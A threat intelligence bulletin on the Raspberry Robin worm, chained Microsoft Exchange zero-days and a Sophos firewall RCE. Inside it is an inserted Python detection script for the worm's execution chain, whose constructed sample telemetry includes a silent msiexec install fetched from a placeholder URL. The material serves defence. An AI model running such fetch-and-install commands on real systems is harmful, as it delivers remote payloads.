Threat Intelligence Update


Read the latest #SecurityGuidance from our Threat Intelligence team.

Raspberry Robin worm

Overview

Severity level: High – Exploitation may result in command and control (C2) compromise, and loss of sensitive data. Compromise requires physical connection.

A relatively new malware, the Russian-associated Raspberry Robin was first observed back in September 2021 and has since been used in a growing number of attacks. The worm is spread either by social-engineered baiting or via infected external drives, and uses Windows Installer to communicate with compromised QNAP-associated domains to download and install malicious DLL files to the infected device.

The payload behaviour follows five distinct steps:

  1. Infected external device attached to victim’s computer
  2. Cmd.exe reads and executes malicious file then launches msiexec.exe that reaches out to malicious URL
  3. Malicious DLL installed from the previously connected URL
  4. Rundll32.exe launches legitimate Windows utility to execute malicious DLL
  5. Outbound connections attempted, usually to TOR networks.
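The five steps above map directly onto process-creation telemetry, so they can be turned into detection logic. The following is an added example (not code from the page or from Quorum Cyber) that runs over constructed, Sysmon-style process events and flags two of the steps: msiexec.exe spawned by cmd.exe with an http(s) URL on its command line (step 2), and rundll32.exe acting as a launcher for another executable (step 4). The event field names, the sample records and the `winutil.exe` placeholder are assumptions; the page does not name the legitimate utility that rundll32.exe launches.

```python
"""Detect two links of the Raspberry Robin execution chain in process telemetry.

Added example; the event shape (pid, ppid, image, cmdline) is a simplified
Sysmon Event ID 1 layout and the sample records below are constructed.
"""
import re
from dataclasses import dataclass

# Any http:// or https:// on a Windows Installer command line is worth a look:
# msiexec normally installs local .msi files, not packages fetched from a URL.
URL_RE = re.compile(r"https?://", re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str      # executable file name only, lower case
    cmdline: str


# Constructed sample telemetry (not real logs). Paths and hosts are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, "explorer.exe", "explorer.exe"),
    # Step 2: cmd.exe executes a file from the removable drive ...
    ProcessEvent(200, 100, "cmd.exe", "cmd.exe /c start E:\\payload.bat"),
    # ... and launches msiexec.exe pointed at a remote URL.
    ProcessEvent(300, 200, "msiexec.exe",
                 "msiexec.exe /q /i http://example.invalid/pkg.msi"),
    # Benign comparison: a local .msi install with no URL and no cmd.exe parent.
    ProcessEvent(400, 1, "msiexec.exe", "msiexec.exe /i C:\\Temp\\tool.msi"),
    # Step 4: rundll32.exe loads the dropped DLL ...
    ProcessEvent(500, 100, "rundll32.exe",
                 "rundll32.exe C:\\ProgramData\\x.dll,EntryPoint"),
    # ... and launches a legitimate Windows utility (placeholder name).
    ProcessEvent(600, 500, "winutil.exe", "winutil.exe"),
]


def index_by_pid(events):
    """Map pid -> event so parent processes can be looked up quickly."""
    return {e.pid: e for e in events}


def msiexec_remote_install(events):
    """Step 2: msiexec.exe spawned by cmd.exe with an http(s) URL as its package."""
    by_pid = index_by_pid(events)
    hits = []
    for e in events:
        if e.image != "msiexec.exe" or not URL_RE.search(e.cmdline):
            continue
        parent = by_pid.get(e.ppid)
        if parent is not None and parent.image == "cmd.exe":
            hits.append(e)
    return hits


def rundll32_child_launch(events):
    """Step 4: any process whose parent is rundll32.exe (rundll32 used as a launcher)."""
    by_pid = index_by_pid(events)
    return [e for e in events
            if e.ppid in by_pid and by_pid[e.ppid].image == "rundll32.exe"]


def detect_chain(events):
    """Return the pids matching each detected link of the chain."""
    return {
        "msiexec_remote_install": [e.pid for e in msiexec_remote_install(events)],
        "rundll32_child_launch": [e.pid for e in rundll32_child_launch(events)],
    }


if __name__ == "__main__":
    for rule, pids in detect_chain(SAMPLE_EVENTS).items():
        print(f"{rule}: {pids}")
```

Each rule on its own is noisy in some environments (administrators do script msiexec from cmd.exe), which is why the example keeps them separate and reports pids rather than raising a single verdict; correlating both rules on one host within a short window, plus a new removable-device event and outbound connections to TOR (steps 1 and 5), is what gives a high-confidence alert. A real deployment would also need to handle pid reuse, which the simple pid index here ignores.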

Read more here.


Microsoft Exchange zero-day under active exploitation

Overview

Severity level: Critical – Two chained exploits with CVSS base scores of 8.8 and 6.3, exploitation could result in system compromise, data loss and lateral access to connected systems.

Vietnam-based cyber security researchers GTSC have reportedly discovered two zero-day vulnerabilities that, when chained together, allow an attacker to perform remote code execution (RCE).

The vulnerabilities have been acknowledged by Microsoft and have been given the following CVEs:

CVE-2022-41040 – Server-Side Request Forgery (SSRF) vulnerability

CVE-2022-41082 – PowerShell RCE vulnerability

When used in unison, CVE-2022-41040 provides an authenticated attacker with the ability to remotely trigger CVE-2022-41082, thereby granting them access to the PowerShell scripts of the target system.

Read more on the Microsoft Exchange zero-day here.


Sophos remote code execution vulnerability under active exploitation

Overview

Severity level: Critical – base score 9.8 out of 10.

A remote code execution (RCE) vulnerability has been detected in the User Portal and Webadmin portal of Sophos Firewalls. This vulnerability is being tracked under CVE-2022-3236.

CVE-2022-3236 has been added to the CISA known exploited vulnerability catalogue.

Read more here.

For more updates, news and guidance visit our dedicated Threat Intelligence page.
